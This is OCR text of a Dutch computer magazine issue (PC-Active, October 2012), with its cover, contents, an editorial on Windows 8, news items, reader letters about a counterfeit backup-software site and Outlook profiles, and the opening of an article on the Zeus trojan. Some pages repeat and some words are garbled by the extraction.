FAKEBOOK: OPLICHTERS ONTMASKEREN OP SOCIAL MEDIA PC-ACTIVE | OKTOBER 2012
16
ANTIVIRUS IN DE CLOUD
AL UW INTERNETVERKEER BESPIONEERD? 42
262
WORKSHOP GEODATA uw eigen data op de kaart
MECHANISCH KEYBOARD 68 Perfectie onder uw vingers
EURO VS. GULDEN
34
Wilders krijgt rekenlesje
83
Google Analytics of logfiles
DOE ‘T ZELF SHAREWARE 14 Makkelijk zelf programmeren
22
VRIJE SCHIJFRUIMTE IN EEN OOGOPSLAG Gratis HD analyse tools
KNMI SUPERCOMPUTER 76 Gedetailleerder voorspellen
ROLLS ROYCE TABLET 64 Wacom Intuos5 touch + actie
MICROSOFT FLIGHT
30
Gratis (?) vliegsimulator
CHIPSET HISTORIE
54
De processor neemt het over
BITCOINS BEVEILIGEN 50 Tips, trucs & tools
TROJAN ZEUS
12
Cybermaffia geanalyseerd
CHIP IN UW BREIN Tussen neuraal en digitaal
26
86
SANDBERG USB 3 Hard Disk Cloner
HD-TRUKENDOOS SNEL KLONEN ZONDER PC
WWW.PC-ACTIVE.NL
Bèta
W U E I N MET
NU INKS! L INFO
INFOLINK 262262
Voor software en extra's bij de artikelen in dit blad
Cover.indd 1
60
LOMOND EVOJET OFFICE
60 pagina's per minuut, 557 miljoen inktdruppels per seconde!
€ 6,99
USB 3 HD CLONER | GEODATA 2 | HD ANALYSE TOOLS | GRAFISCHE TABLET | ANTIVIRUS SPIONEERT
WEBSUCCES METEN
NR. 262 | OKT. 2012
JAARGANG 24 | 2012
(inclusief oefendossier)
9/6/12 5:11 PM
FAKEBOOK: OPLICHTERS ONTMASKEREN OP SOCIAL MEDIA PC-ACTIVE | OKTOBER 2012
16
ANTIVIRUS IN DE CLOUD
AL UW INTERNETVERKEER BESPIONEERD? 42
262
WORKSHOP GEODATA uw eigen data op de kaart
MECHANISCH KEYBOARD 68 Perfectie onder uw vingers
EURO VS. GULDEN
34
Wilders krijgt rekenlesje
83
Google Analytics of logfiles
DOE ‘T ZELF SHAREWARE 14 Makkelijk zelf programmeren
22
VRIJE SCHIJFRUIMTE IN EEN OOGOPSLAG Gratis HD analyse tools
KNMI SUPERCOMPUTER 76 Gedetailleerder voorspellen
ROLLS ROYCE TABLET 64 Wacom Intuos5 touch + actie
MICROSOFT FLIGHT
30
Gratis (?) vliegsimulator
CHIPSET HISTORIE
54
De processor neemt het over
BITCOINS BEVEILIGEN 50 Tips, trucs & tools
TROJAN ZEUS
12
Cybermaffia geanalyseerd
CHIP IN UW BREIN Tussen neuraal en digitaal
26
60
SANDBERG USB 3 Hard Disk Cloner
HD-TRUKENDOOS SNEL KLONEN ZONDER PC
WWW.PC-ACTIVE.NL
Bèta
UEW T NIE U M S! N INK L INFO
INFOLINK 262262
Voor software en extra's bij de artikelen in dit blad
Cover.indd 1
60
LOMOND EVOJET OFFICE
60 pagina's per minuut, 557 miljoen inktdruppels per seconde!
€ 6,99
USB 3 HD CLONER | GEODATA 2 | HD ANALYSE TOOLS | GRAFISCHE TABLET | ANTIVIRUS SPIONEERT
WEBSUCCES METEN
NR. 262 | OKT. 2012
JAARGANG 24 | 2012
(inclusief oefendossier)
06-09-12 18:00
INHOUD
VOORWOORD
HOKJESGEEST
Inhoud.indd 4
Op 26 oktober verschijnt Windows 8 op de markt (net als PC-Active # 263, overigens). Dat lijkt al snel, maar op dit moment is er nog volop speculatie over alle nieuwe features die Microsoft nog zal onthullen. Zo introduceerde Nokia begin september samen met Microsoft de Lumia 820- en 920-smartphones, waarop de mobiele versie van het besturingssysteem - Windows 8 Phone - draait. De Nederlandse productmanager mocht de demonstratie-exemplaren op straffe des doods niet uit handen geven, omdat er apps op zaten, die Microsoft nog niet aangekondigd had. Nokia zelf kon ook nog niets zeggen over de beschikbaarheid van de toestellen in Nederland. Er werd ons dus een prachtige high-tech wortel voorgehouden, waar we met het water in de mond enkel naar mochten kijken. Wat opviel was dat de presentatoren van zowel Microsoft als Nokia gretig lieten zien hoeveel plezier ze met hun gezin beleefden tijdens het gebruik van de smartphone. Iemand van Microsoft liet zien hoe hij zijn vrouw een hogere status gaf in zijn beginscherm en iemand van Nokia toonde foto’s van zijn zoon tijdens een Super Bowl-wedstrijd. Zelfs Steve Ballmer vertelde al handenwrijvend dat hij die avond samen met zijn zoon en de Lumia 920 op stap zou gaan. Windows 8: it’s blijkbaar all in the family. Toch viert Windows 8 Phone meer de individualiteit dan het familiegevoel. We mogen het geen Metro meer noemen wegens copyrights, maar het is de bedoeling dat al uw contacten in de interface hun eigen individuele tile - blokje - krijgen. Hierin plaatst u een foto of andere leuke afbeelding van uw gesprekspartner en geeft u hem/haar eventueel een plekje in uw startscherm. Deze blokjes vult u aan met uw persoonlijke voorkeuren voor apps en vervolgens kunt u naar hartenlust schuiven tot alle blokjes in de volgorde staan die u verkiest. Dat wordt heerlijk ongedwongen tijd verprutsen met schuiven en herschikken. Microsoft plaatst ons dus in een hokje. Daarbij is het de bedoeling dat uw hokje zo goed mogelijk weergeeft wie u bent en wat uw interesses zijn. Zo ontstaat uw individuele blokkendoos, die u vervolgens vooral moet gaan delen. Eerlijk gezegd geloof ik er wel in. Exhibitioneer uw individualiteit. Op de volgende redactievergadering zal ik zeggen dat het hoog tijd wordt voor een PC-Active Windows 8-app. Houdt u een tegeltje voor ons vrij?
30
MICROSOFT FLIGHT
PC-ACTIVE MAAKT TESTVLUCHT Het is met afstand de langstlopende franchise van Microsoft. Maar liefst tien versies verschenen er van Flight Simulator. Maar sinds 2006 is het stil aan het vliegfront. Microsoft Flight Simulator X was de laatste uitgave en de studio werd opgeheven. Einde verhaal? Nee, opeens verscheen Flight, een (bijna) gratis instapsimulatie.
12
ZEUS
GOD VAN DE MALWARE Ondanks zijn Griekse naam heeft Zeus als malware niets te maken met het in deze tijd zonovergoten Griekenland. Neen, deze malware komt meestal uit het oosten. Digitaal onderzoeker Paul Mulder doet de achtergronden uit de doeken.
60
RUSSISCHE PRINTER LOMOND EVOJET OFFICE
Een Russische inkjet die zestig pagina’s per minuut print? In kleur? Dat willen we graag zelf zien! Want wie weet, dit technisch foefje zou wel eens de toekomst kunnen zijn…
Jeroen Geelhoed - Hoofdredacteur
[email protected]
9/6/12 5:18 PM
ALGEMEEN 6 KORT NIEUWS 8 INBOX 20 PRIVACY
CBP is papieren tijger?
34
EURO VERSUS GULDEN VERREKENT WILDERS ZICH?
21 WORD ABONNEE MET KORTING! 38 BOEKEN 46 ABORT RETRY FAIL!
Geert Wilders wil graag de gulden terug. Winkeliers geven hem gelijk, omdat daarmee veel minder wisselgeld in de kassa nodig zou zijn. Maar klopt dat wel?
Pac-Man gepakt 59 LEUK OF MEUK? 80 HET LAB
WordPress updaten 89 WAMMES’ COLUMN
Opzettelijke valkuilen 90 COLOFON
SOFTWARE 14 SHAREWARE
Lekker zelf programmeren 16 LEKKE ANTIVIRUS?
Uw webgebruik ligt op straat 22 FREEWARE
Vrije HD-ruimte inzichtelijk 30 MICROSOFT FLIGHT
26
GECHIPTE BREINEN
HARDWARE
IDEAAL VOOR HERSENSPOELING
54 CHIPSETS
Ze bestaan al, mensen die rondlopen met een chip in hun hersenen geïmplanteerd. Tot nog toe gaat het alleen om medische toepassingen, maar ook minder prettige scenario’s zijn denkbaar. Wordt The Manchurian Candidate dan toch werkelijkheid?
60 RUSSISCHE SUPERPRINTER
Van nul tot nu Lomond EvoJet Office 64 WACOM INTUOS 5 TOUCH
Win er eentje! 68 MECHANISCH TOETSENBORD
Liefst echte schakelaars! 86 SANDBERG USB 3 HD CLONER
ACHTERGROND
12 ZEUS
Cybermaffia doorgelicht 26 CHIP IN UW BREIN
Manchurian Candidate 2.0? 34 EURO VS. GULDEN 37 DOSSIER: HACKER… 40 FAKEBOOK
Namaak in social media viert hoogtij 42 GEODATA DEEL 2
W! U E I N BIJ
S LINK ELEN INFO ARTIKNEN, N E R! ONZOOR BRO EN MEE V ADS NLO DOW
Zet Amsterdam op de kaart 50 DENKWERK
Bitcoins beveiligen 72 HUIS VAN DE TOEKOMST 76 3RW1N KR011
KNMI-computer 83 GOOGLE ANALYTICS
INFOLINK 262262
Of liever de eigen logs?
Meer informatie op pagina 90
Inhoud.indd 5
9/6/12 5:26 PM
KORT NIEUWS Sony Reader dunner en lichter Sony introduceert een dunnere en lichtere e-reader, compleet met WiFi voor snelle toegang tot aanvullende diensten. De PRS-T2 is de opvolger van de Sony PRS-T1, waarvan er in de Benelux meer dan 175 duizend zijn verkocht. Het apparaatje heeft een 6 inch EInk-scherm met touch-functionaliteit. Volgens Sony gaat alles met dit scherm vloeiender en vlotter. Ook de navigatie is vereenvoudigd en intuïtiever. Naast het aanraakscherm kunt u met drukknoppen bladeren en navigeren. Het energiebeheer moet het mogelijk maken twee maanden lang boeken te lezen op één acculading, mits u de WiFi uitgeschakeld houdt. De Sony Reader weegt 164 gram en ondersteunt diverse e-bookformaten. Via WiFi kunt u boeken aanschaffen bij Bol.com. De Sony Reader PRS-T2 is sinds begin september verkrijgbaar in rood, wit of zwart. De prijs is honderdveertig euro. HTTP://WWW.SONY.NL/
Gamen tijdens het filmfestival Het Nederlands Film Festival werkt dit jaar samen met Dutch Game Garden om de beste nieuwe games uit eigen land aan een breed publiek te tonen. Tijdens het evenement, dat onder de naam INDIGO plaatsvindt, kunnen bezoekers op zaterdag 29 september bijna dertig games zelf uitproberen in het stadhuis van Utrecht. INDIGO is een jaarlijks terugkerende showcase van Dutch Game Garden, het promotiebureau van de vaderlandse gamesindustrie, die hiermee nieuwe games van getalenteerde Nederlandse gameontwikkelaars voor het voetlicht wil brengen. Daar zitten commerciële titels tussen, maar ook hobbyprojecten van ervaren designers en afstudeerproducties van ambitieuze studenten. Het evenement valt dit jaar samen met het Nederlands Film Festival, wat voor beide organisaties aanleiding is om de handen ineen te slaan. Omdat het een hands-on evenement is, mag iedereen alle titels zelf uitproberen. De makers van de spelletjes zijn aanwezig, zodat geïnteresseerden hun alles kunnen vragen over de games die ze hebben gemaakt. HTTP://WWW.INDIGOSHOWCASE.NL/
Boothbabes te sexy voor Chinezen ChinaJoy 2012, één van de grootste digitale entertainmentbeurzen in China, heeft besloten om schaarsgeklede boothbabes de toegang tot de beursvloer te ontzeggen. Na tien jaar zijn de organisatoren de sexy promotiedames zat en hebben ze de boothbabes nu voor het eerst de toegang tot de expo ontzegd. Bikini’s en blote ruggen zijn niet meer toegestaan en minirokjes en hotpants moeten in ieder geval de heup bedekken. Vooral tieners bezoeken de beurs en de boothbabes zouden een verkeerde boodschap kunnen overbrengen op deze groep, aldus de organisatoren. Om na te gaan of de regels ook worden nageleefd, stuurde de organisatie veertig werknemers de beursvloer op om controles uit te voeren. Om die reden werd een presentatie van het Chinese model Li Ling afgebroken, omdat haar kostuum wel erg sexy was.
6
PC-ACTIVE | Nr. 262 – 2012
Kort nieuws.indd 6
9/6/12 9:56 AM
NIEUWS
| KORT
Creditcard met echte Bitcoins? Er is een enorme hype ontstaan rondom een creditcard waarop Bitcoins als muntsysteem zouden worden gebruikt. Eindelijk plastic geld dat volledig anoniem is? In PC-Active # 247 van mei 2011 hebben we het systeem achter deze digitale munteenheid al eens uitgelegd. Voor wie het nummer niet meteen bij de hand heeft, een bitcoin kunt u op uw computer aanmaken, als de oplossing van een cryptografisch probleem. Zoiets kost flink wat computerkracht en daarmee is de waarde van een bitcoin in feite gebaseerd op de waarde van de hardware die noodzakelijk is om de oplossing te vinden. Hoe duurder de hardware, hoe sneller een bitcoin berekend kan worden. Door deze koppeling heeft het digitale muntje dus een zekere waarde, net zoals vroeger ons geld door goud werd gedekt. Zodra een bitcoin ontstaat, kan deze worden gebruikt voor betalingen. Die transacties zijn volledig anoniem. Als u een bitcoin ontvangt, kunt u nagaan dat het geen vervalsing is en ook dat niemand anders deze bezit. Vanwege de anonimiteit worden bitcoins regelmatig in het criminele circuit gebruikt, maar datzelfde kunnen we ook over gewoon geld zeggen. Alleen is gewoon geld met enige moeite nog te traceren, om nog maar te zwijgen over de vele elektronische transacties die we dagelijks doen. Zoals gezegd suggereerden veel berichten dat de Bitcoin-creditcard ook anoniem zou zijn. Omdat bijna geen enkele winkelier de bitcoins accepteert - organisaties als WikiLeaks overigens wel -, maar een creditcard wel, leek hier even een utopie te ontstaan. Helaas, de bedenkers van de creditcard hebben de geruchten ontzenuwd. Het idee is dat u uw bitcoins kunt omzetten in gewone dollars of euro’s en alleen als uw identiteit is geverifieerd.
Hacktivisme in opmars Deze zomer gooiden Russische hackers een lijst van zesenhalf miljoen wachtwoordhashes van LinkedIn-profielen op het internet. Die aanval trok veel aandacht, maar het is geen alleenstaand geval. Eerdere studies signaleerden ook al een toename van het aantal inbraken. Dat blijkt bijvoorbeeld uit het Data Breach Investigations Report van Verizon. “Veruit de meeste cyberaanvallen worden gedaan door criminelen die uit zijn op geld,” legt Wade Baker uit, directeur Risk Intelligence bij de Amerikaanse telecomreus. Wat aanvalsmethoden betreft blijft het gebruik van hacking en malware toenemen. Zo is het kraken van systemen één van de meest succesvolle methodes die heel vaak tot gegevensverlies leidt. Ook via malware weten aanvallers vrijwel altijd gegevensbestanden te verkrijgen. Baker stelt ook vast dat cybercriminaliteit aan het industrialiseren is. “Veel van die criminelen werken als een gewoon bedrijf en bieden bijvoorbeeld via internet aan om malware te ontwerpen die bepaalde bedrijven en de bijbehorende websites te lijf gaan.” Steeds meer aanvallen door hackers gebeuren onder het mom van politieke en maatschappelijke doeleinden. Dit zogeheten hacktivisme bestaat al een tijdje, maar het ging lange tijd vooral om het defacen (besmeuren) van websites, aldus Baker. “De laatste maanden gaat het meer en meer om het stelen van informatie van een bedrijf.” Hoewel het grootste aantal cyberaanvallen nog steeds wordt uitgevoerd door criminelen die uit zijn op financieel gewin, was vorig jaar toch al 58 procent van alle gestolen data het gevolg van activisme. De impact van dit soort aanvallen is dus groot. Bovendien zijn tegelijkertijd ook de financiële gevolgen veel groter, want wanneer het uitsluitend om geld gaat, probeert men doorgaans eerder kleine datahoeveelheden of geldbedragen te ontfutselen.
PC-ACTIVE | Nr. 262 – 2012
Kort nieuws.indd 7
7
9/6/12 9:56 AM
INBOX MAIL VAN LEZERS
TEKST : MARK GAMBLE
REAGEREN? Vragen kunt u sturen naar
[email protected]. Of surf naar ons forum ‘Ik heb een probleem!’ [1] en stel uw vraag. Dit kan zonder registratie. Alleen als u op de antwoorden wilt reageren is aanmelden noodzakelijk.
Niet zo Handy Backup Ik ben lange tijd een geregistreerd gebruiker van het back-upprogramma Handy Backup geweest. Later ben ik overgestapt op Backup Platinum, omdat het meer mogelijkheden biedt. Maar er zijn twee websites op internet te vinden, namelijk handybackup.com en handybackup.net. Nu bleek handybackup.net een keer een nieuwere versie met plug-ins te hebben en die heb ik toen geïnstalleerd. Tot mijn verbazing werkte de versie niet en via de support kreeg ik geen respons. Ik heb toen een mailtje gestuurd naar handybackup.com en tot mijn verbazing liet men mij weten dat handybackup. net een nagemaakte site bleek te zijn, die de versie van handybackup.com namaakte en de versie ook verkocht. Dit scheen niet rechtmatig te zijn. Dus tot mijn grote verbazing zie ik op de cd bij blad # 260 van juli/augustus 2012 een Handy Backup-versie van de handybackup.net-site staan. Hebben jullie enig idee wat nu precies het verschil is tussen de twee websites? Misschien is het wel interessant om eens contact op te nemen met de mensen van de handybackup.com-site. Ik hoor graag wat jullie ervan vinden. HANS WILLEMSE, E-MAIL
Onze welgemeende verontschuldigingen voor de verwarring; het is niet onze gewoonte dat we reclame maken voor niet-legitieme websites. Overigens is er ook een website http://www.novosoft.com/ - dat is de naam van de softwareproducent die overigens zowel op http://www.handybackup.net/ als http://www. handybackup.com/ wordt genoemd. Kortom, verwarring alom en als we via de Who IS van Network Solutions kijken welke domeinen bij wie horen, dan zien we dat http://www.handybackup.com/ van een bedrijf uit Texas in de Verenigde Staten is, terwijl http://www.handybackup. net/een Russische eigenaar heeft. Nog verwarrender wordt het wanneer op beide websites onder de knop About us vrijwel identieke informatie staat over de
8
Inbox.indd 8
oprichting van het bedrijf en zelfs dezelfde naam: Novosoft. Noot van de redactie: Daags na bovenstaande mail kreeg onze lezer een antwoord van het echte Novosoft Inc. uit Texas in de Verenigde Staten, waarin het bedrijf meldt dat de website http://www. handybackup.net/ software aanbiedt dat zogenaamde marketingtools bevat: waarschijnlijk zijn dit zaken als toolbars en tracking-mogelijkheden, zodat de makers precies kunnen zien wat u allemaal met de software doet. Daarnaast heeft het Russische Novosoft LLC de inhoud van de website van de echte Novosoft op http://www.handybackup.com/ nagemaakt, maar op aandringen is dit blijkbaar weer teruggedraaid. Verder meldt het echte Novosoft Inc. dat diverse klanten het slachtoffer zijn geworden van de praktijken van het Russische Novosoft LLC en dat de enige officiële website van het legitieme Novosoft Inc. de website http://www.handybackup.com/ [2] is.
Infolinks (1) Ik ben vanaf het allereerste nummer van PCActive al abonnee, en voel me nu toch geroepen een opmerking over de nieuwe Infolinks te maken. Houd op met die nummers, en zet gewoon maar aanklikbare links daarvoor in de plaats. Erg gewoontjes, maar wel klantvriendelijk. Elke keer blad pakken, nummer opzoeken, intikken op PC-Active-site is ouderwets, omslachtig en past niet in hedendaagse ICT. De diverse maten floppies/ disks en als laatst de cd-rom waren ten opzichte van concurrerende bladen altijd een opvallende en leuke onderscheiding. Nu een wat nieuw bedacht, maar niet klant(abonnee)vriendelijk ‘je moet toch wat’-oplossing. EEF VAN DER HEYDEN, E-MAIL
We wilden een zo goed mogelijk systeem voor onze lezers, zodat bij elk artikel aan de hand van het Infolink-nummer snel de juiste informatie
PC-ACTIVE | Nr. 262 – 2012
9/6/12 10:02 AM
SCHIET! EN WIN! tevoorschijn kon worden getoverd. We hebben daar wel zeker over nagedacht en bieden daarom ook meerdere manieren aan om de informatie op te vragen. Als eerste kan dit via het invoerveld op onze homepage op http:// www.pc-active.nl/, maar het is ook mogelijk om de URL direct in de browser in te typen: http://www.pc-active.nl/xxxxxx of http://www.pc-active.nl/infolink/xxxxxx, waarbij u de xxxxxx vervangt door het Infolink-nummer. Maar zoals we op de cover van het vorige nummer hebben vermeld en in de extra informatie op pagina 17 daarin, is het systeem nog in ontwikkeling en op bepaalde punten te verbeteren. Dus we nemen ook uw reactie graag mee voor de verdere ontwikkeling van het systeem!
Infolinks (2) Ik ben geen computer-weetal, maar een ‘gewone’ gebruiker die af en toe achter de computer zit. Ik ben al jaren abonnee omdat buiten de inhoud - die gewoon goed is - zo’n handige cd-rom bij PC-Active zat, die ik in de computer kon stoppen en bekijken wat je nodig hebt of handig is om te gebruiken… niets meer en niets minder. Interessante programma’s van de cd-rom hield ik bij in een Excel-bestand, zodat ik ze makkelijker kon terugvinden als ik een bepaald programma nodig had. Nu met die nieuwe Infolinks: sorry, maar daar heb ik niets aan, heb ook geen zin om dat allemaal zelf te moeten doen, geen zin om uren achter een computer te moeten zitten en als ik er alleen al naar kijk, vraag ik mezelf af of er wel zoveel meer op staat dan op de cd-rom. In mijn ogen is het niet meer dan een eenvoudige manier van bezuinigen, waar de abonnee de dupe van is. Tevens vraag ik mij af of het wel allemaal wettelijk zuivere koek is; tenslotte is dit een blad waarvoor wordt geadverteerd met de cd-rom. Dus wat mij betreft, geen goed idee en ik kijk ook niet meer uit naar het blad. Zal aan het eind van de rit dan ook wel gaan opzeggen. EEF SCHULTZ, E-MAIL
De Infolinks moeten vooral gezien worden als extra informatie bij de artikelen. Voorheen plaatsen we aan het eind van ieder artikel in het kader Informatie altijd alle links die werden genoemd, waarbij er van onze lezers werd verwacht dat ze deze handmatig overtypten. Deze informatie is nu te vinden onder de Infolinks en de links naar de genoemde websites in de artikelen zijn dan direct aan te klikken. Wat betreft de cd-rom: deze is altijd als gratis extra bij het blad meegeleverd. Daar betaalde u in feite niets extra’s voor. En zoals bekend heeft een cd-rom nu eenmaal een beperkte opslagcapaciteit en is het produceren van een maandelijkse dvd voor meer opslag helaas te kostbaar om de huidige prijs van PC-Active te kunnen behouden; het tijdschrift zou dan duurder moeten worden. Vandaar dat we hebben besloten om ook de software voortaan online aan te bieden. Dat kost wat extra handelingen aan uw zijde, maar zorgt er wel voor dat u altijd makkelijk de nieuwste versie van de software kunt downloaden. Met de cd-rom liepen we soms al een maand achter, omdat de productie van een cd-rom eenmaal wat tijd vergt.
INBOX
2012 is een geweldig sportjaar! Wat is uw mooiste sportherinnering? Deel deze herinnering met Epson en maak kans op een volledig verzorgde VIP-trip voor twee personen naar Manchester. Bezoek een training van een aantal van ’s werelds beste voetballers en zie met eigen ogen hoe Manchester United het in maart 2013* opneemt tegen Reading Football Club op het legendarische Old Trafford. Daarnaast ontvangt u een gloednieuwe Expression Premium XP-800 printer met een waarde van meer dan € 200, hiermee haalt u het maximale uit uw sportieve herinneringen!
Deelname werkt als volgt Ga naar www.pc-active.nl/epson2012sportjaar vvoor aanvullende informatie over het uploaden van de foto’s die uw sportherinnering van dit jaar het beste of mooiste weergeven. Inzendingen voor deelname aan deze wedstrijd dienen uiterlijk 31 december 2012 binnen te zijn.
Meerdere adresboeken in Outlook 2003 Ik ben op zoek naar een e-mailprogramma waarin ik twee adresboeken afzonderlijk kan gebruiken: één voor familie en vrienden en de ander voor andere privézaken als huisarts en tandarts. Ik gebruik momenteel Outlook 2003, maar daarin is het volgens mij niet mogelijk. Bestaan er dergelijke programma’s, of moet ik daarvoor twee verschillende mailprogramma’s gebruiken? Je zou verwachten dat de optie van twee adresboeken reeds bestond, want steeds meer communicatie gebeurt toch digitaal. PIETER D. TULP, SPIJKENISSE
PC-ACTIVE | Nr. 262 – 2012 *Datum is onderhevig aan wijzigingen
Inbox.indd 9
9
9/6/12 10:02 AM
SCHIET! EN WIN! tevoorschijn kon worden getoverd. We hebben daar wel zeker over nagedacht en bieden daarom ook meerdere manieren aan om de informatie op te vragen. Als eerste kan dit via het invoerveld op onze homepage op http:// www.pc-active.nl/, maar het is ook mogelijk om de URL direct in de browser in te typen: http://www.pc-active.nl/xxxxxx of http://www.pc-active.nl/infolink/xxxxxx, waarbij u de xxxxxx vervangt door het Infolink-nummer. Maar zoals we op de cover van het vorige nummer hebben vermeld en in de extra informatie op pagina 17 daarin, is het systeem nog in ontwikkeling en op bepaalde punten te verbeteren. Dus we nemen ook uw reactie graag mee voor de verdere ontwikkeling van het systeem!
Infolinks (2) Ik ben geen computer-weetal, maar een ‘gewone’ gebruiker die af en toe achter de computer zit. Ik ben al jaren abonnee omdat buiten de inhoud - die gewoon goed is - zo’n handige cd-rom bij PC-Active zat, die ik in de computer kon stoppen en bekijken wat je nodig hebt of handig is om te gebruiken… niets meer en niets minder. Interessante programma’s van de cd-rom hield ik bij in een Excel-bestand, zodat ik ze makkelijker kon terugvinden als ik een bepaald programma nodig had. Nu met die nieuwe Infolinks: sorry, maar daar heb ik niets aan, heb ook geen zin om dat allemaal zelf te moeten doen, geen zin om uren achter een computer te moeten zitten en als ik er alleen al naar kijk, vraag ik mezelf af of er wel zoveel meer op staat dan op de cd-rom. In mijn ogen is het niet meer dan een eenvoudige manier van bezuinigen, waar de abonnee de dupe van is. Tevens vraag ik mij af of het wel allemaal wettelijk zuivere koek is; tenslotte is dit een blad waarvoor wordt geadverteerd met de cd-rom. Dus wat mij betreft, geen goed idee en ik kijk ook niet meer uit naar het blad. Zal aan het eind van de rit dan ook wel gaan opzeggen. EEF SCHULTZ, E-MAIL
De Infolinks moeten vooral gezien worden als extra informatie bij de artikelen. Voorheen plaatsen we aan het eind van ieder artikel in het kader Informatie altijd alle links die werden genoemd, waarbij er van onze lezers werd verwacht dat ze deze handmatig overtypten. Deze informatie is nu te vinden onder de Infolinks en de links naar de genoemde websites in de artikelen zijn dan direct aan te klikken. Wat betreft de cd-rom: deze is altijd als gratis extra bij het blad meegeleverd. Daar betaalde u in feite niets extra’s voor. En zoals bekend heeft een cd-rom nu eenmaal een beperkte opslagcapaciteit en is het produceren van een maandelijkse dvd voor meer opslag helaas te kostbaar om de huidige prijs van PC-Active te kunnen behouden; het tijdschrift zou dan duurder moeten worden. Vandaar dat we hebben besloten om ook de software voortaan online aan te bieden. Dat kost wat extra handelingen aan uw zijde, maar zorgt er wel voor dat u altijd makkelijk de nieuwste versie van de software kunt downloaden. Met de cd-rom liepen we soms al een maand achter, omdat de productie van een cd-rom eenmaal wat tijd vergt.
INBOX
2012 is een geweldig sportjaar! Wat is uw mooiste sportherinnering? Deel deze herinnering met Epson en maak kans op een volledig verzorgde VIP-trip voor twee personen naar Manchester. Bezoek een training van een aantal van ’s werelds beste voetballers en zie met eigen ogen hoe Manchester United het in maart 2013* opneemt tegen Reading Football Club op het legendarische Old Trafford. Daarnaast ontvangt u een gloednieuwe Expression Premium XP-800 printer met een waarde van meer dan € 200, hiermee haalt u het maximale uit uw sportieve herinneringen!
Deelname werkt als volgt Ga naar www.pc-active.nl/epson2012sportjaar vvoor voor aanvullende aanvullendeinformatie informatieover overhet het uploaden van de foto’s die uw sportherinnering van dit jaar het beste of mooiste weergeven. Inzendingen voor deelname aan deze wedstrijd dienen uiterlijk 31 december 2012 binnen te zijn.
Meerdere adresboeken in Outlook 2003 Ik ben op zoek naar een e-mailprogramma waarin ik twee adresboeken afzonderlijk kan gebruiken: één voor familie en vrienden en de ander voor andere privézaken als huisarts en tandarts. Ik gebruik momenteel Outlook 2003, maar daarin is het volgens mij niet mogelijk. Bestaan er dergelijke programma’s, of moet ik daarvoor twee verschillende mailprogramma’s gebruiken? Je zou verwachten dat de optie van twee adresboeken reeds bestond, want steeds meer communicatie gebeurt toch digitaal. PIETER D. TULP, SPIJKENISSE
*Datum is onderhevig aan wijzigingen
PC-ACTIVE | Nr. 262 – 2012 *Datum is onderhevig aan wijzigingen
Inbox.indd 1 9 Untitled-1
9
9/6/12 10:02 7-9-2012 8:47:48AM
INBOX
Meerdere profielen instellen
Het is mogelijk om in Outlook 2003 gebruik te maken van diverse adresboeken, om zo een onderscheid te maken tussen privézaken en andere mailgroepen. U kunt namelijk gebruikmaken van profielen in Outlook 2003. Ga naar het Windows Configuratiescherm en zoek het pictogram genaamd E-mail op. Dubbelklik daarop en klik vervolgens op de knop Toevoegen. Nu kunt u een nieuw e-mailaccount opgeven. Het is geen probleem om daar dezelfde gegevens in te voeren als onder uw originele account, want u kunt namelijk gewoon twee verschillende profielen gebruiken voor hetzelfde e-mailadres. U hebt dan ook de mogelijkheid verschillende e-mailadressen in te voeren. Hebt u uw nieuwe e-mailaccount opgegeven, dan moet u nog even het vinkje inschakelen bij Te openen profiel weergeven, zodat Outlook u elke keer bij het starten vraagt welk profiel u wilt gebruiken.
Te openen profiel opgeven
meer dan vijf vellen dubbelzijdig wilt afdrukken. In ieder geval zou ik het als gebruiker op prijs stellen om die optie als keuzemogelijkheid te hebben als er inderdaad een tijdsbesparing mee valt te behalen. Misschien kunt u overwegen de vermelding of ‘handmatig dubbelzijdig printen’ ondersteund wordt, in een volgende printertest mee te nemen, of misschien wel alsnog bij de Infolink te vermelden als dit simpel te doen is? En mogelijk kan het een aandachtspunt zijn voor de fabrikant als zo’n optie niet aanwezig is? Als hetzelfde model bijvoorbeeld toch ook al zonder duplexer verkocht wordt, dan hoeft dit niet eens iets extra te kosten. G.M. VAN DIJK, E-MAIL
Printertest # 261 Ik zie graag tests van apparatuur, om op de hoogte te blijven en te weten te komen waar je op moet letten bij aanschaf. Ik heb de betreffende printertest uit het septembernummer, PC-Active # 261, dan ook met interesse doorgespit. Eén ding viel me op: bij dubbelzijdig printen hebben sommige printers een wachttijd voor elk vel papier. Dit om de geprinte zijde te laten drogen voordat het vel weer de duplexer in gaat voor het printen van de andere zijde. De Xerox Workcentre 6015V/NI kan niet automatisch dubbelzijdig printen, maar wordt geprezen om de handige ondersteuning van het handmatig dubbelzijdig printen, door het hele pak papier omgedraaid nog eens in de papierlade te leggen en de andere zijden te printen. Wat ik nu mis in de test, is de vermelding of je bij de printers met duplexer een optie ‘handmatig dubbelzijdig printen’ kunt kiezen en zo net te doen alsof er geen duplexer in zit. Dan hoef je de betreffende droogtijd alleen maar in acht te nemen bij het omdraaien van het hele geprinte pak papier en zal het printen per saldo mogelijk heel wat sneller klaar zijn. Zo’n optie zou een snelle ‘work-around’ kunnen zijn als je de printer op dat moment voor jezelf alleen gebruikt en bijvoorbeeld
10
Inbox.indd 10
Een interessante vraag en we hebben het nog even goed voor u uitgezocht. Bij de HP7510 blijkt handmatig dubbelzijdig afdrukken inderdaad een optie, net zoals bij de HP6500, die van huis uit niet dubbelzijdig kan afdrukken. Ook bij de Brother DCP-J725 evenals bij de Epson PX730 is handmatig tweezijdig afdrukken mogelijk. Bij de specificaties zult u die optie echter niet snel tegenkomen, maar het lijkt ons - evenals de keuze tussen langs de lange zijde of de korte zijde omdraaien bij tweezijdig printen - een standaard afdrukoptie. Bij een volgende test zouden we het in de specificaties kunnen opnemen.
INFOLINK 262012
Voor de voetnoten bij dit artikel: http://www.pc-active.nl/262012
PC-ACTIVE | Nr. 262 – 2012
9/6/12 5:32 PM
Anatomie van een Trojan
Zeus tekst : paul mulder
Ondanks zijn naam heeft Zeus als malware niets te maken met het in deze tijd zonovergoten Griekenland. Nee, dit Trojaanse paard komt uit het oosten. Digitaal onderzoeker Paul Mulder doet de achtergronden uit de doeken.
I
n mijn praktijk als digitaal onderzoeker krijg ik met vreemde situaties en verzoeken te maken en dat maakt dit vakgebied ook gelijk weer aantrekkelijk. Afgezien van de directe hulpverlening bij ernstige digitale infecties doe ik onderzoek naar de werkwijze van cybercriminelen. Onlangs kwam het Trojaanse paard Zeus uitgebreid in het nieuws. Vanuit mijn vakgebied weet ik maar al te goed hoe de bendes achter zulk soort malware te werk gaan.
